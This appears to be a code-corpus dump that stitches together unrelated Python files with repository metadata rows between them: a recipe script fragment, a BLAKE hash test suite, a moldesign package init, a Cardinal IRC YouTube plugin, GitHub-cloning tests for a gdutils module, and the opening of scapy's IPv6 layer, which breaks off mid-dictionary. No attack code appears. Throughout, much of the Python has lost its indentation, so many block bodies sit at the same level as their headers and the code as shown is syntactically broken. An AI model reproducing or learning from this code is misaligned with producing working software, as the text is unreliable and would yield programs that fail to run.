print('pasta time!')
if ingredient in apple_pie:
print('apple pie time!')
if ingredient in ratatouille:
print('ratatouille time!')
if ingredient in chocolate_cake:
print('chocolate cake time!')
if ingredient in omelette:
print('omelette time!')
| 33.157895
| 81
| 0.71746
|
2a689497e3cd7605152f2e81c0fa3d095653246e
| 7,856
|
py
|
Python
|
thirdparty/blake/blake_test.py
|
fir3storm/Dagon
|
68cc7dc84e6f496a73d53e0c01c1d56ec18f4bb5
|
[
"MIT"
] | 188
|
2017-05-15T19:12:59.000Z
|
2022-01-19T14:00:25.000Z
|
thirdparty/blake/blake_test.py
|
Warlockk/Dagon
|
f065d7bbd7598f9a8c43bd12ba6b528cfef7377e
|
[
"MIT"
] | 108
|
2017-05-16T11:41:57.000Z
|
2019-02-01T18:53:08.000Z
|
thirdparty/blake/blake_test.py
|
Warlockk/Dagon
|
f065d7bbd7598f9a8c43bd12ba6b528cfef7377e
|
[
"MIT"
] | 62
|
2017-05-16T21:50:40.000Z
|
2022-03-21T06:38:05.000Z
|
#!/usr/bin/env python
intro = """
blake_test.py
version 4
This program tests blake.py individually and against a C
reference implementation wrapped with blake_wrapper.py.
It works for both Python2 and Python3.
Copyright (c) 2009-2012 by Larry Bugbee, Kent, WA
ALL RIGHTS RESERVED.
blake_test.py IS EXPERIMENTAL SOFTWARE FOR EDUCATIONAL
PURPOSES ONLY. IT IS MADE AVAILABLE "AS-IS" WITHOUT
WARRANTY OR GUARANTEE OF ANY KIND. ITS USE SIGNIFIES
FULL ACCEPTANCE OF ALL RISK, UNDER ALL CIRCUMSTANCES, NO
EXCEPTIONS.
To make your learning and experimentation less cumbersome,
blake_test.py is free for any use.
Enjoy,
Larry Bugbee
April 2012
"""
import sys
from ctypes import *
from binascii import hexlify, unhexlify
_version = '1'
# import two modules with identical class and method names, but
# keep them individually identifiable
have_blake = False
have_blake_wrapper = False
try:
from blake import BLAKE as BLAKEpy
have_blake = True
except:
print('\n *** unable to import blake.py *** \n')
try:
from blake_wrapper import BLAKE as BLAKEwrap
    # the next line is obsolescent and will be removed someday
from blake_wrapper import BLAKE_func as BLAKEwrap_func
have_blake_wrapper = True
except:
print('\n *** unable to import blake_wrapper.py *** \n')
# ---------------------------------------------------------------
# test vectors
def basic_tests():
if 0:
print(intro)
def test_BLAKE(hashlen, msg, expect):
print(' BLAKE-%d: msg = %s length = %d' %
(hashlen, msg.decode(), len(msg)))
digest = BLAKE(hashlen).digest(msg)
print(' %s %s' % ('valid ' if digest == unhexlify(expect)
else 'ERROR >>>', hexlify(digest).decode()))
if 1:
print('')
print(' single null-byte message:')
msg = b'\x00'
hashlen = 256
expect = (b'0ce8d4ef4dd7cd8d62dfded9d4edb0a7' +
b'74ae6a41929a74da23109e8f11139c87')
test_BLAKE(hashlen, msg, expect)
hashlen = 224
expect = (b'4504cb0314fb2a4f7a692e696e487912' +
b'fe3f2468fe312c73a5278ec5')
test_BLAKE(hashlen, msg, expect)
hashlen = 512
expect = (b'97961587f6d970faba6d2478045de6d1' +
b'fabd09b61ae50932054d52bc29d31be4' +
b'ff9102b9f69e2bbdb83be13d4b9c0609' +
b'1e5fa0b48bd081b634058be0ec49beb3')
test_BLAKE(hashlen, msg, expect)
hashlen = 384
expect = (b'10281f67e135e90ae8e882251a355510' +
b'a719367ad70227b137343e1bc122015c' +
b'29391e8545b5272d13a7c2879da3d807')
test_BLAKE(hashlen, msg, expect)
if 1:
print('')
print(' 72 null-bytes message:')
msg = b'\x00' * 72
hashlen = 256
expect = (b'd419bad32d504fb7d44d460c42c5593f' +
b'e544fa4c135dec31e21bd9abdcc22d41')
test_BLAKE(hashlen, msg, expect)
hashlen = 224
expect = (b'f5aa00dd1cb847e3140372af7b5c46b4' +
b'888d82c8c0a917913cfb5d04')
test_BLAKE(hashlen, msg, expect)
print('')
print(' 144 null-bytes message:')
msg = b'\x00' * 144
hashlen = 512
expect = (b'313717d608e9cf758dcb1eb0f0c3cf9f' +
b'c150b2d500fb33f51c52afc99d358a2f' +
b'1374b8a38bba7974e7f6ef79cab16f22' +
b'ce1e649d6e01ad9589c213045d545dde')
test_BLAKE(hashlen, msg, expect)
hashlen = 384
expect = (b'0b9845dd429566cdab772ba195d271ef' +
b'fe2d0211f16991d766ba749447c5cde5' +
b'69780b2daa66c4b224a2ec2e5d09174c')
test_BLAKE(hashlen, msg, expect)
if 1:
print('')
print(' more:')
if 1:
msg = b'Kilroy was here!'
hashlen = 256
expect = (b'b25c02ccfa1f664d25a15d999b56a4be' +
b'1ad84a029a96be5d654387a2def99916')
test_BLAKE(hashlen, msg, expect)
msg = b'The quick brown fox jumps over the lazy dog'
hashlen = 512
expect = (b'1F7E26F63B6AD25A0896FD978FD050A1' +
b'766391D2FD0471A77AFB975E5034B7AD' +
b'2D9CCF8DFB47ABBBE656E1B82FBC634B' +
b'A42CE186E8DC5E1CE09A885D41F43451')
test_BLAKE(hashlen, msg, expect)
if 1:
msg = b'\x00' * 55
hashlen = 256
expect = (b'dc980544f4181cc43505318e317cdfd4' +
b'334dab81ae035a28818308867ce23060')
test_BLAKE(hashlen, msg, expect)
msg = b'\x00' * 56
hashlen = 256
expect = (b'26ae7c289ebb79c9f3af2285023ab103' +
b'7a9a6db63f0d6b6c6bbd199ab1627508')
test_BLAKE(hashlen, msg, expect)
msg = b'\x00' * 111
hashlen = 512
expect = (b'125695c5cc01de48d8b107c101778fc4' +
b'47a55ad3440a17dc153c6c652faecdbf' +
b'017aed68f4f48826b9dfc413ef8f14ae' +
b'7dfd8b74a0afcf47b61ce7dcb1058976')
test_BLAKE(hashlen, msg, expect)
msg = b'\x00' * 112
hashlen = 512
expect = (b'aa42836448c9db34e0e45a49f916b54c' +
b'25c9eefe3f9f65db0c13654bcbd9a938' +
b'c24251f3bedb7105fa4ea54292ce9ebf' +
b'5adea15ce530fb71cdf409387a78c6ff')
test_BLAKE(hashlen, msg, expect)
if 0:
import time
print('')
        print(' simple timing test:')
def time_it(hashsize, iter):
t0 = time.time()
for i in range(iter):
digest = BLAKE(hashsize).digest(b'\x00') # hash a single null byte
t1 = time.time()
template = ' %8d iterations of single-block BLAKE-%d took %8.6f seconds'
print(template % (iter, hashsize, (t1 - t0)))
iterations = [10, 100, 1000]
hashsizes = [256, 512]
for hashsize in hashsizes:
for iter in iterations:
time_it(hashsize, iter)
# --------------------------------------------------------------------------
# --------------------------------------------------------------------------
if have_blake:
# testing blake.py independently
BLAKE = BLAKEpy
print('\n Testing blake.py:')
print(' -----------------')
basic_tests()
if have_blake_wrapper:
# testing blake_wrapper.py independently
BLAKE = BLAKEwrap
BLAKE_func = BLAKEwrap_func
print('\n Testing blake_wrapper.py:')
print(' -------------------------')
basic_tests()
if have_blake and have_blake_wrapper:
# now run a series of tests against each other
print('\n Comparing results fm blake.py with blake_wrapper.py:')
print(' ----------------------------------------------------')
hashsizes = [256, 512]
testchar = b'\xff'
for hashsize in hashsizes:
print(' BLAKE-%d:' % hashsize)
errors = 0
for i in range(550):
if (BLAKEpy(hashsize).final(testchar * i) !=
BLAKEwrap(hashsize).final(testchar * i)):
errors += 1
print(' *** blake.py and blake_wrapper.py' +
' do not agree for chr(%d)*%d ***' % (testchar, i))
if not errors:
print(' no errors found')
print('')
# --------------------------------------------------------------------------
# --------------------------------------------------------------------------
# --------------------------------------------------------------------------
| 32.196721
| 87
| 0.53806
|
4d3ae95ae00aaaa423668aeb768e22f7e546ebb4
| 271
|
py
|
Python
|
moldesign/orbitals/__init__.py
|
Autodesk/molecular-design-toolkit
|
5f45a47fea21d3603899a6366cb163024f0e2ec4
|
[
"Apache-2.0"
] | 147
|
2016-07-15T18:53:55.000Z
|
2022-01-30T04:36:39.000Z
|
moldesign/orbitals/__init__.py
|
cherishyli/molecular-design-toolkit
|
5f45a47fea21d3603899a6366cb163024f0e2ec4
|
[
"Apache-2.0"
] | 151
|
2016-07-15T21:35:11.000Z
|
2019-10-10T08:57:29.000Z
|
moldesign/orbitals/__init__.py
|
cherishyli/molecular-design-toolkit
|
5f45a47fea21d3603899a6366cb163024f0e2ec4
|
[
"Apache-2.0"
] | 33
|
2016-08-02T00:04:51.000Z
|
2021-09-02T10:05:04.000Z
|
def toplevel(o):
__all__.append(o.__name__)
return o
__all__ = []
from .primitives import *
from .gaussians import *
from .orbitals import *
from .cartesian import *
from .spherical import *
from .atomic_basis_fn import *
from .basis import *
from .wfn import *
| 19.357143
| 30
| 0.723247
|
f1fb14f7c9e4a07a352d797989213fed3843d32f
| 6,155
|
py
|
Python
|
plugins/youtube/plugin.py
|
dkim286/Cardinal
|
716d38fae5c992315e8087de74ad0db2947d0d48
|
[
"MIT"
] | 96
|
2015-01-24T00:00:45.000Z
|
2022-03-15T14:06:57.000Z
|
plugins/youtube/plugin.py
|
dkim286/Cardinal
|
716d38fae5c992315e8087de74ad0db2947d0d48
|
[
"MIT"
] | 166
|
2015-01-02T02:30:24.000Z
|
2022-03-24T20:03:55.000Z
|
plugins/youtube/plugin.py
|
dkim286/Cardinal
|
716d38fae5c992315e8087de74ad0db2947d0d48
|
[
"MIT"
] | 63
|
2015-02-13T06:46:01.000Z
|
2022-02-24T10:50:34.000Z
|
import datetime
import re
import logging
import requests
from twisted.internet import defer
from twisted.internet.threads import deferToThread
from cardinal.decorators import command, event, help
from cardinal.exceptions import EventRejectedMessage
VIDEO_URL_REGEX = re.compile(r'https?:\/\/(?:www\.)?youtube\..{2,4}\/watch\?.*(?:v=(.+?))(?:(?:&.*)|$)', flags=re.IGNORECASE) # noqa: E501
VIDEO_URL_SHORT_REGEX = re.compile(r'https?:\/\/(?:www\.)?youtu\.be\/(.+?)(?:(?:\?.*)|$)', flags=re.IGNORECASE) # noqa: E501
# Fetched from the YouTube API on 2021-06-04, hopefully it doesn't change.
MUSIC_CATEGORY_ID = 10
# The following two functions were borrowed from Stack Overflow:
# https://stackoverflow.com/a/64232786/242129
def get_isosplit(s, split):
if split in s:
n, s = s.split(split)
else:
n = 0
return n, s
def parse_isoduration(s):
# Remove prefix
s = s.split('P')[-1]
# Step through letter dividers
days, s = get_isosplit(s, 'D')
_, s = get_isosplit(s, 'T')
hours, s = get_isosplit(s, 'H')
minutes, s = get_isosplit(s, 'M')
seconds, s = get_isosplit(s, 'S')
# Convert all to seconds
dt = datetime.timedelta(
days=int(days),
hours=int(hours),
minutes=int(minutes),
seconds=int(seconds),
)
return dt
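# --- Illustrative example (not part of the original plugin) ---
# A quick sketch of parse_isoduration() on hypothetical YouTube-style
# ISO 8601 duration strings.
def _example_parse_isoduration():
    dt = parse_isoduration('PT1H2M3S')  # 1 hour, 2 minutes, 3 seconds
    assert dt == datetime.timedelta(hours=1, minutes=2, seconds=3)
    dt = parse_isoduration('P1DT30M')   # 1 day, 30 minutes
    assert dt == datetime.timedelta(days=1, minutes=30)
    return dt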
class YouTubePlugin:
logger = None
"""Logging object for YouTubePlugin"""
api_key = None
"""API key for Youtube API"""
def __init__(self, cardinal, config):
# Initialize logging
self.logger = logging.getLogger(__name__)
if config is None:
return
if 'api_key' in config:
self.api_key = config['api_key']
@command(['youtube', 'yt'])
@help("Get the first YouTube result for a given search.")
@help("Syntax: .youtube <search query>")
@defer.inlineCallbacks
def search(self, cardinal, user, channel, msg):
# Before we do anything, let's make sure we'll be able to query YouTube
if self.api_key is None:
cardinal.sendMsg(
channel,
"YouTube plugin is not configured correctly. "
"Please set API key."
            )
            return
# Grab the search query
try:
search_query = msg.split(' ', 1)[1]
except IndexError:
cardinal.sendMsg(channel, "Syntax: .youtube <search query>")
return
try:
result = yield self._search(search_query)
except Exception:
self.logger.exception("Failed to search YouTube")
cardinal.sendMsg(channel, "Error while searching YouTube")
return
if result is None:
cardinal.sendMsg(channel, "No videos found matching that search.")
return
try:
message = yield self._get_formatted_details(
result['id']['videoId']
)
except Exception:
self.logger.exception("Error finding search result details")
cardinal.sendMsg(channel, "Error while searching YouTube")
return
cardinal.sendMsg(channel, message)
@defer.inlineCallbacks
def _get_formatted_details(self, video_id):
params = {
'id': video_id,
'maxResults': 1,
'part': 'snippet,statistics,contentDetails'
}
result = (yield self._form_request("videos", params))['items'][0]
return self._parse_item(result)
@defer.inlineCallbacks
def _search(self, search_query):
params = {
'q': search_query,
'part': 'snippet',
'maxResults': 1,
'type': 'video',
}
result = yield self._form_request("search", params)
if 'error' in result:
raise Exception("Error searching Youtube: %s" % result['error'])
try:
return result['items'][0]
except IndexError:
return None
@event('urls.detection')
@defer.inlineCallbacks
def _get_video_info(self, cardinal, channel, url):
match = re.match(VIDEO_URL_REGEX, url)
if not match:
match = re.match(VIDEO_URL_SHORT_REGEX, url)
if not match:
raise EventRejectedMessage
video_id = match.group(1)
params = {
'id': video_id,
'maxResults': 1,
'part': 'snippet,statistics,contentDetails',
}
try:
result = yield self._form_request("videos", params)
except Exception:
self.logger.exception("Failed to fetch info for %s'" % video_id)
raise EventRejectedMessage
try:
message = self._parse_item(result['items'][0])
cardinal.sendMsg(channel, message)
except Exception:
self.logger.exception("Failed to parse info for %s'" % video_id)
raise EventRejectedMessage
@defer.inlineCallbacks
def _form_request(self, endpoint, params):
# Add API key to all requests
params['key'] = self.api_key
r = yield deferToThread(
requests.get,
"https://www.googleapis.com/youtube/v3/" + endpoint,
params=params,
)
return r.json()
def _parse_item(self, item):
title = str(item['snippet']['title'])
views = int(item['statistics']['viewCount'])
uploader = str(item['snippet']['channelTitle'])
if len(uploader) == 0:
uploader = "(not available)"
dt = parse_isoduration(item['contentDetails']['duration'])
video_id = str(item['id'])
# Decorate music videos
category = int(item['snippet']['categoryId'])
if category == MUSIC_CATEGORY_ID:
title = '♫ ' + title + ' ♫'
message_parts = [
"Title: {}".format(title),
"Uploaded by: {}".format(uploader),
"Duration: {}".format(dt),
"{:,} views".format(views),
"https://youtube.com/watch?v={}".format(video_id),
]
return "[ {} ]".format(' | '.join(message_parts))
entrypoint = YouTubePlugin
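# --- Illustrative sketch (not part of the original plugin) ---
# _parse_item() turns a YouTube API video resource into the one-line IRC
# message the plugin sends. The item dict below is a hand-written,
# hypothetical stand-in for a real API response; passing config=None to the
# constructor simply leaves the API key unset, which is fine for parsing.
def _example_parse_item():
    plugin = YouTubePlugin(None, None)
    item = {
        'id': 'dQw4w9WgXcQ',
        'snippet': {
            'title': 'Example video',
            'channelTitle': 'Example channel',
            'categoryId': '10',  # music category, so the title gets decorated
        },
        'statistics': {'viewCount': '12345'},
        'contentDetails': {'duration': 'PT3M33S'},
    }
    return plugin._parse_item(item)
    # -> "[ Title: ♫ Example video ♫ | Uploaded by: Example channel |
    #      Duration: 0:03:33 | 12,345 views |
    #      https://youtube.com/watch?v=dQw4w9WgXcQ ]"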
| 29.7343
| 139
| 0.576767
|
cb7918fde0bdef8c015d146f90f22520513365af
| 7,609
|
py
|
Python
|
tests/test_datamine.py
|
KeiferC/extract-table
|
71995693aace37ab9a3637b472d996d7b9e68207
|
[
"MIT"
] | null | null | null |
tests/test_datamine.py
|
KeiferC/extract-table
|
71995693aace37ab9a3637b472d996d7b9e68207
|
[
"MIT"
] | 1
|
2020-11-24T18:08:42.000Z
|
2020-12-17T04:30:42.000Z
|
tests/test_datamine.py
|
KeiferC/extract-table
|
71995693aace37ab9a3637b472d996d7b9e68207
|
[
"MIT"
] | 1
|
2020-11-24T17:53:40.000Z
|
2020-11-24T17:53:40.000Z
|
import os
import json
import subprocess
import pytest
import gdutils.datamine as dm
#########################################
# Regression Test Inputs #
#########################################
standards_path = './docs/source/src/examples/naming_convention.json'
gh_user = 'octocat'
gh_acct_type = 'users'
gh_repos = [ # Note: this list is subject to change
'boysenberry-repo-1',
'git-consortium',
'hello-worId',
'Hello-World',
'linguist',
'octocat.github.io',
'Spoon-Knife',
'test-repo1']
public_gh_repos = [ # Note: also subject to change
'https://github.com/octocat/boysenberry-repo-1.git',
'https://github.com/octocat/git-consortium.git',
'https://github.com/octocat/hello-worId.git',
'https://github.com/octocat/Hello-World.git',
'https://github.com/octocat/linguist.git',
'https://github.com/octocat/octocat.github.io.git',
'https://github.com/octocat/Spoon-Knife.git',
'https://github.com/octocat/test-repo1.git']
gitignores = [ # Note: same
'./.gitignore',
'./.pytest_cache/.gitignore',
'./tests/dumps/linguist/.gitignore',
'./tests/dumps/linguist/vendor/grammars/Sublime-Inform/.gitignore']
htmls = [ # Note: same here
'./tests/dumps/linguist/samples/HTML/pages.html',
'./tests/dumps/octocat.github.io/index.html',
'./tests/dumps/Spoon-Knife/index.html']
descriptions = [ # Note: ditto
'./tests/dumps/linguist/.git/description',
'./tests/dumps/octocat.github.io/.git/description',
'./tests/dumps/git-consortium/.git/description',
'./tests/dumps/hello-worId/.git/description',
'./tests/dumps/test-repo1/.git/description',
'./tests/dumps/boysenberry-repo-1/.git/description',
'./tests/dumps/Hello-World/.git/description',
'./tests/dumps/Spoon-Knife/.git/description',
'./.git/description']
#########################################
# Regression Tests #
#########################################
def test_list_gh_repos():
with pytest.raises(Exception):
dm.list_gh_repos()
with pytest.raises(Exception):
dm.list_gh_repos('octocat')
with pytest.raises(Exception):
dm.list_gh_repos('octocat', 'asdf')
with pytest.raises(Exception): # randomly generated string for user
dm.list_gh_repos('XGx2ePfMTt3jbQEGWCzCHaRzWpC6Vz7qY48VY', 'users')
repos = dm.list_gh_repos('octocat', 'users')
assert set(repos) == set(zip(gh_repos, public_gh_repos))
def test_clone_gh_repos():
with pytest.raises(Exception):
dm.clone_gh_repos()
with pytest.raises(Exception):
dm.clone_gh_repos('octocat')
with pytest.raises(Exception):
dm.clone_gh_repos('octocat', 'asdf')
with pytest.raises(Exception):
dm.clone_gh_repos('octocat', 'orgs')
with pytest.raises(Exception): # randomly generated string for user
dm.clone_gh_repos('XGx2ePfMTt3jbQEGWCzCHaRzWpC6Vz7qY48VY', 'users')
dm.clone_gh_repos('octocat', 'users', outpath='tests/dumps')
dirs = next(os.walk(os.path.join('tests', 'dumps')))
assert set(dirs[1]) == set(gh_repos)
dm.clone_gh_repos('mggg-states', 'orgs', ['CT-shapefiles'],
os.path.join('tests', 'dumps2'))
dirs = next(os.walk(os.path.join('tests', 'dumps2')))
assert set(dirs[1]) == {'CT-shapefiles'}
dm.clone_gh_repos('mggg-states', 'orgs',
['AZ-shapefiles', 'HI-shapefiles'],
os.path.join('tests', 'dumps2'))
dirs = next(os.walk(os.path.join('tests', 'dumps2')))
assert set(dirs[1]) == {'CT-shapefiles', 'AZ-shapefiles',
'HI-shapefiles'}
def test_list_files_of_type():
with pytest.raises(Exception):
dm.list_files_of_type(1)
files = dm.list_files_of_type('description')
ds = descriptions.copy()
ds.append('./tests/dumps2/AZ-shapefiles/.git/description')
ds.append('./tests/dumps2/CT-shapefiles/.git/description')
ds.append('./tests/dumps2/HI-shapefiles/.git/description')
assert set(files) == set(ds)
files = dm.list_files_of_type('.q;weoifh0[238ubfasdf')
assert files == []
files = dm.list_files_of_type(['description', '.html'],
os.path.join('tests', 'dumps'))
assert files.sort() == (descriptions + htmls).sort()
files = dm.list_files_of_type('description',
os.path.join('tests', 'dumps'))
descriptions.remove('./.git/description')
descrs = [d.lstrip('./') for d in descriptions]
assert set(files) == set(descrs)
files = dm.list_files_of_type('.gitignore', exclude_hidden = True)
assert files == []
files = dm.list_files_of_type('.gitignore', exclude_hidden = False)
assert files == gitignores
def test_get_keys_by_category(): # test passing list of categories, try numbers
with open(standards_path) as json_file:
standards_raw = json.load(json_file)
with pytest.raises(Exception):
dne = dm.get_keys_by_category(standards_raw, '-1293urnpef13qewf')
with pytest.raises(Exception):
numbered = dm.get_keys_by_category(
{1 : {9: 'asdf'}, 2 : {8: 'fdsa'}}, 1)
with pytest.raises(Exception):
xs = dm.get_keys_by_category(
{'foo' : [1, 2, {'fdaa : asdf'}]}, 'foo')
numbered = dm.get_keys_by_category(
{1 : [{9: 'asdf'}], 2 : [{8: 'fdsa'}]}, 1)
assert numbered == [9]
parties = dm.get_keys_by_category(standards_raw, 'parties')
assert parties == ['D', 'R', 'L', 'G', 'I', 'U']
xs = dm.get_keys_by_category(
{'[1, 2, 3]': ['asdf', 'fdaa'],
'[4, 5, 6]': [{'fdas': 'fdsa'}, {'hjkl' : 'hjkl'}],
'foo': [{'bar': 'bar'}]}, '[1, 2, 3]')
assert xs == ['a', 's', 'd', 'f', 'f', 'd', 'a', 'a']
xs = dm.get_keys_by_category(
{'[1, 2, 3]': ['asdf', 'fdaa'],
'[4, 5, 6]': [{'fdas': 'fdsa'}, {'hjkl' : 'hjkl'}],
'foo': [{'bar': 'bar'}]}, '[4, 5, 6]')
assert xs == ['fdas', 'hjkl']
xs = dm.get_keys_by_category(
{'[1, 2, 3]': [[1, 2, 3], {'fdaa' : 'asdf'}],
'[4, 5, 6]': [{'fdas': 'fdsa'}, {'hjkl' : 'hjkl'}],
'foo': [{'bar': 'bar'}]}, '[1, 2, 3]')
assert xs == [1, 2, 3, 'fdaa']
xs = dm.get_keys_by_category(
{'category1' : [['key1']],
'category2' : [['key2'], {'key3': 'value3'}]},
['category1', 'category2'])
assert xs == ['key1', 'key2', 'key3']
def test_remove_repos():
with pytest.raises(Exception):
dm.remove_repos('XGx2ePfMTt3jbQEGWCzCHaRzWpC6Vz7qY48VY')
dm.remove_repos(os.path.join('tests', 'dumps'))
dirs = next(os.walk(os.path.join('tests', 'dumps')))
assert not any(list(map(lambda x, y: x == y, set(dirs[1]), set(gh_repos))))
dm.remove_repos(os.path.join('tests', 'dumps2'))
dirs = next(os.walk(os.path.join('tests', 'dumps2')))
assert not any(list(map(lambda x, y: x == y, set(dirs[1]),
{'CT-shapefiles', 'AZ-shapefiles',
'HI-shapefiles'})))
path_to_ak_shp = os.path.join('tests', 'dumps', 'AK-shapefiles')
dm.clone_gh_repos('mggg-states', 'orgs', ['AK-shapefiles'],
os.path.join('tests', 'dumps'))
assert os.path.join(path_to_ak_shp, 'README.md') in \
dm.list_files_of_type('.md', path_to_ak_shp)
dm.remove_repos(path_to_ak_shp)
with pytest.raises(Exception):
xs = dm.list_files_of_type('.md', path_to_ak_shp)
dm.remove_repos(os.path.join('tests', 'dumps')) # should not raise anything
| 36.581731
| 79
| 0.588251
|
124d913e75828aea3849266130bf05a56d039beb
| 146,756
|
py
|
Python
|
venv/local/lib/python2.7/dist-packages/scapy/layers/inet6.py
|
pengwu/scapy_env
|
3db9c5dea2e219048a2387649d6d89be342903d9
|
[
"MIT"
] | null | null | null |
venv/local/lib/python2.7/dist-packages/scapy/layers/inet6.py
|
pengwu/scapy_env
|
3db9c5dea2e219048a2387649d6d89be342903d9
|
[
"MIT"
] | null | null | null |
venv/local/lib/python2.7/dist-packages/scapy/layers/inet6.py
|
pengwu/scapy_env
|
3db9c5dea2e219048a2387649d6d89be342903d9
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python
#############################################################################
## ##
## inet6.py --- IPv6 support for Scapy ##
## see http://natisbad.org/IPv6/ ##
## for more informations ##
## ##
## Copyright (C) 2005 Guillaume Valadon <guedou@hongo.wide.ad.jp> ##
## Arnaud Ebalard <arnaud.ebalard@eads.net> ##
## ##
## This program is free software; you can redistribute it and/or modify it ##
## under the terms of the GNU General Public License version 2 as ##
## published by the Free Software Foundation. ##
## ##
## This program is distributed in the hope that it will be useful, but ##
## WITHOUT ANY WARRANTY; without even the implied warranty of ##
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ##
## General Public License for more details. ##
## ##
#############################################################################
"""
IPv6 (Internet Protocol v6).
"""
import random
import socket
import sys
if not socket.has_ipv6:
raise socket.error("can't use AF_INET6, IPv6 is disabled")
if not hasattr(socket, "IPPROTO_IPV6"):
# Workaround for http://bugs.python.org/issue6926
socket.IPPROTO_IPV6 = 41
if not hasattr(socket, "IPPROTO_IPIP"):
# Workaround for https://bitbucket.org/secdev/scapy/issue/5119
socket.IPPROTO_IPIP = 4
from scapy.config import conf
from scapy.base_classes import *
from scapy.data import *
from scapy.fields import *
from scapy.packet import *
from scapy.volatile import *
from scapy.sendrecv import sr,sr1,srp1
from scapy.as_resolvers import AS_resolver_riswhois
from scapy.supersocket import SuperSocket,L3RawSocket
from scapy.arch import *
from scapy.utils6 import *
from scapy.layers.l2 import *
from scapy.layers.inet import *
from scapy.utils import inet_pton, inet_ntop, strxor
from scapy.error import warning
if conf.route6 is None:
# unused import, only to initialize conf.route6
import scapy.route6
#############################################################################
# Helpers ##
#############################################################################
def get_cls(name, fallback_cls):
return globals().get(name, fallback_cls)
##########################
## Neighbor cache stuff ##
##########################
conf.netcache.new_cache("in6_neighbor", 120)
def neighsol(addr, src, iface, timeout=1, chainCC=0):
"""
Sends an ICMPv6 Neighbor Solicitation message to get the MAC address
of the neighbor with specified IPv6 address addr. 'src' address is
used as source of the message. Message is sent on iface. By default,
timeout waiting for an answer is 1 second.
If no answer is gathered, None is returned. Else, the answer is
returned (ethernet frame).
"""
nsma = in6_getnsma(inet_pton(socket.AF_INET6, addr))
d = inet_ntop(socket.AF_INET6, nsma)
dm = in6_getnsmac(nsma)
p = Ether(dst=dm)/IPv6(dst=d, src=src, hlim=255)
p /= ICMPv6ND_NS(tgt=addr)
p /= ICMPv6NDOptSrcLLAddr(lladdr=get_if_hwaddr(iface))
res = srp1(p,type=ETH_P_IPV6, iface=iface, timeout=1, verbose=0,
chainCC=chainCC)
return res
def getmacbyip6(ip6, chainCC=0):
"""
Returns the mac address to be used for provided 'ip6' peer.
neighborCache.get() method is used on instantiated neighbor cache.
Resolution mechanism is described in associated doc string.
(chainCC parameter value ends up being passed to sending function
used to perform the resolution, if needed)
"""
if in6_ismaddr(ip6): # Multicast
mac = in6_getnsmac(inet_pton(socket.AF_INET6, ip6))
return mac
iff,a,nh = conf.route6.route(ip6, dev=conf.iface6)
if iff == LOOPBACK_NAME:
return "ff:ff:ff:ff:ff:ff"
if nh != '::':
ip6 = nh # Found next hop
mac = conf.netcache.in6_neighbor.get(ip6)
if mac:
return mac
res = neighsol(ip6, a, iff, chainCC=chainCC)
if res is not None:
if ICMPv6NDOptDstLLAddr in res:
mac = res[ICMPv6NDOptDstLLAddr].lladdr
else:
mac = res.src
conf.netcache.in6_neighbor[ip6] = mac
return mac
return None
#############################################################################
#############################################################################
### IPv6 addresses manipulation routines ###
#############################################################################
#############################################################################
class Net6(Gen): # syntax ex. fec0::/126
"""Generate a list of IPv6s from a network address or a name"""
name = "ipv6"
ipaddress = re.compile(r"^([a-fA-F0-9:]+)(/[1]?[0-3]?[0-9])?$")
def __init__(self, net):
self.repr = net
tmp = net.split('/')+["128"]
if not self.ipaddress.match(net):
tmp[0]=socket.getaddrinfo(tmp[0], None, socket.AF_INET6)[0][-1][0]
netmask = int(tmp[1])
self.net = inet_pton(socket.AF_INET6, tmp[0])
self.mask = in6_cidr2mask(netmask)
self.plen = netmask
def __iter__(self):
def m8(i):
if i % 8 == 0:
return i
tuple = filter(lambda x: m8(x), xrange(8, 129))
a = in6_and(self.net, self.mask)
tmp = map(lambda x: x, struct.unpack('16B', a))
def parse_digit(a, netmask):
netmask = min(8,max(netmask,0))
a = (int(a) & (0xffL<<netmask),(int(a) | (0xffL>>(8-netmask)))+1)
return a
self.parsed = map(lambda x,y: parse_digit(x,y), tmp, map(lambda x,nm=self.plen: x-nm, tuple))
def rec(n, l):
if n and n % 2 == 0:
sep = ':'
else:
sep = ''
if n == 16:
return l
else:
ll = []
for i in xrange(*self.parsed[n]):
for y in l:
ll += [y+sep+'%.2x'%i]
return rec(n+1, ll)
return iter(rec(0, ['']))
def __repr__(self):
return "Net6(%r)" % self.repr
#############################################################################
#############################################################################
### IPv6 Class ###
#############################################################################
#############################################################################
class IP6Field(Field):
def __init__(self, name, default):
Field.__init__(self, name, default, "16s")
def h2i(self, pkt, x):
if type(x) is str:
try:
x = in6_ptop(x)
except socket.error:
x = Net6(x)
elif type(x) is list:
x = map(Net6, x)
return x
def i2m(self, pkt, x):
return inet_pton(socket.AF_INET6, x)
def m2i(self, pkt, x):
return inet_ntop(socket.AF_INET6, x)
def any2i(self, pkt, x):
return self.h2i(pkt,x)
def i2repr(self, pkt, x):
if x is None:
return self.i2h(pkt,x)
elif not isinstance(x, Net6) and not type(x) is list:
if in6_isaddrTeredo(x): # print Teredo info
server, flag, maddr, mport = teredoAddrExtractInfo(x)
return "%s [Teredo srv: %s cli: %s:%s]" % (self.i2h(pkt, x), server, maddr,mport)
elif in6_isaddr6to4(x): # print encapsulated address
vaddr = in6_6to4ExtractAddr(x)
return "%s [6to4 GW: %s]" % (self.i2h(pkt, x), vaddr)
return self.i2h(pkt, x) # No specific information to return
def randval(self):
return RandIP6()
class SourceIP6Field(IP6Field):
__slots__ = ["dstname"]
def __init__(self, name, dstname):
IP6Field.__init__(self, name, None)
self.dstname = dstname
def i2m(self, pkt, x):
if x is None:
dst=getattr(pkt,self.dstname)
iff,x,nh = conf.route6.route(dst)
return IP6Field.i2m(self, pkt, x)
def i2h(self, pkt, x):
if x is None:
dst=getattr(pkt,self.dstname)
if isinstance(dst,Gen):
r = map(conf.route6.route, dst)
r.sort()
if r[0] == r[-1]:
x=r[0][1]
else:
warning("More than one possible route for %s"%repr(dst))
return None
else:
iff,x,nh = conf.route6.route(dst)
return IP6Field.i2h(self, pkt, x)
class DestIP6Field(IP6Field, DestField):
bindings = {}
def __init__(self, name, default):
IP6Field.__init__(self, name, None)
DestField.__init__(self, name, default)
def i2m(self, pkt, x):
if x is None:
x = self.dst_from_pkt(pkt)
return IP6Field.i2m(self, pkt, x)
def i2h(self, pkt, x):
if x is None:
x = self.dst_from_pkt(pkt)
return IP6Field.i2h(self, pkt, x)
ipv6nh = { 0:"Hop-by-Hop Option Header",
4:"IP",
6:"TCP",
17:"UDP",
41:"IPv6",
43:"Routing Header",
44:"Fragment Header",
47:"GRE",
50:"ESP Header",
